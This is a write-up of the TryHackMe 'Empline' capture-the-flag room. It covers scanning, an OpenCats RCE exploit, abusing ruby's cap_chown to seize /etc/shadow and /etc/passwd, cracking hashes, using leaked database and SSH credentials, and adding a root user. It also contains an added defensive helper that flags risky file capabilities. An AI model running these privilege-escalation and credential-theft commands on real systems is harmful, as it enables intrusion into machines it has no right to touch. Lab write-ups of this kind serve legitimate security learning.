Empline

Room Link: https://tryhackme.com/room/empline

Scans

Initial scan

Kali

nmap -A $VICTIM

Longer scan

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir --url http://$VICTIM/ -w /usr/share/dirb/wordlists/big.txt -l

Kali

echo "$VICTIM job.empline.thm" >> /etc/hosts

Initial Shell

OpenCats 0.9.4 has an RCE exploit.

Exploit: https://www.exploit-db.com/raw/50585

Kali

chmod +x exploit.sh
./exploit.sh
./exploit.sh http://job.empline.thm/

Victim

getcap -r / 2>/dev/null

Victim

ls -lah /etc/shadow
ruby -e 'require "fileutils"; FileUtils.chown("www-data", "www-data", "/etc/shadow")'
ls -lah /etc/shadow
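
Added here as a defender's check, not part of the original writeup: a small POSIX sh/awk helper that parses the output of `getcap -r /` (both the older `path = caps+ep` and the newer `path caps=ep` libcap formats) and flags capabilities such as cap_chown that let a general-purpose binary like ruby take ownership of /etc/shadow, which is exactly what the step above abuses. The sample getcap output and the list of flagged capabilities are constructed for this example, not taken from the room; on a live host, pipe the real getcap output into the function instead.

```shell
#!/bin/sh
# Audit helper (added example, not from the room): flag file capabilities that
# let a binary bypass ownership or permission checks, as ruby's cap_chown did.

# Constructed sample of `getcap -r / 2>/dev/null` output, covering both the
# old "path = caps+ep" and the new "path caps=ep" libcap output formats.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/local/bin/ruby = cap_chown+ep
/usr/bin/python3.8 cap_setuid=ep
/usr/sbin/mtr-packet cap_net_raw=ep
/usr/bin/gdb cap_dac_read_search,cap_sys_ptrace=ep'

# Capabilities that, on an interpreter or general-purpose binary, amount to
# root-equivalent file access. This list is an assumption for the example.
DANGEROUS_CAPS='cap_chown cap_dac_override cap_dac_read_search cap_fowner cap_setuid cap_setgid cap_sys_admin cap_sys_ptrace'

# Read getcap lines on stdin; print "path<TAB>capability" for each dangerous cap.
flag_dangerous_caps() {
    awk -v dangerous="$DANGEROUS_CAPS" '
    BEGIN { n = split(dangerous, d, " "); for (i = 1; i <= n; i++) bad[d[i]] = 1 }
    NF >= 2 {
        path = $1
        caps = ($2 == "=") ? $3 : $2      # old format has a literal "=" as field 2
        sub(/[=+][a-z]*$/, "", caps)        # drop the trailing +ep / =ep flag set
        m = split(caps, list, ",")
        for (i = 1; i <= m; i++) if (list[i] in bad) printf "%s\t%s\n", path, list[i]
    }'
}

# Count how many dangerous (path, capability) pairs a getcap dump contains.
count_flagged() {
    printf '%s\n' "$1" | flag_dangerous_caps | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps
# Live host: getcap -r / 2>/dev/null | flag_dangerous_caps
```

Anything the helper prints should be reviewed and, unless the capability is genuinely required, removed with `setcap -r <path>`.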

Victim

Now that we can read both of these files we can transfer them to Kali. I let this run for a while but it wasn't cracking any hashes.

cat /etc/passwd
cat /etc/shadow

Kali

unshadow passwd shadow > passwords.txt

Kali

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

I went back to check the box and found the database credentials.

Victim

find / -name "config.php"
cat /var/www/opencats/config.php

Kali

mysql -h $VICTIM -u james -png6pUFvsGNtw

Kali(mysql)

show databases;
use opencats;
show tables;
select * from user;

There were a few hashes from users so I put them in crackstation and one returned a result.

TCP/22 - SSH

Kali

ssh george@$VICTIM
Password: pretonnevippasempre

Privilege Escalation

Since I already had the ability to change any file, I just added a new root user to /etc/passwd.

Victim

ruby -e 'require "fileutils"; FileUtils.chown("george", "george", "/etc/passwd")'
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
su new
Password: 123
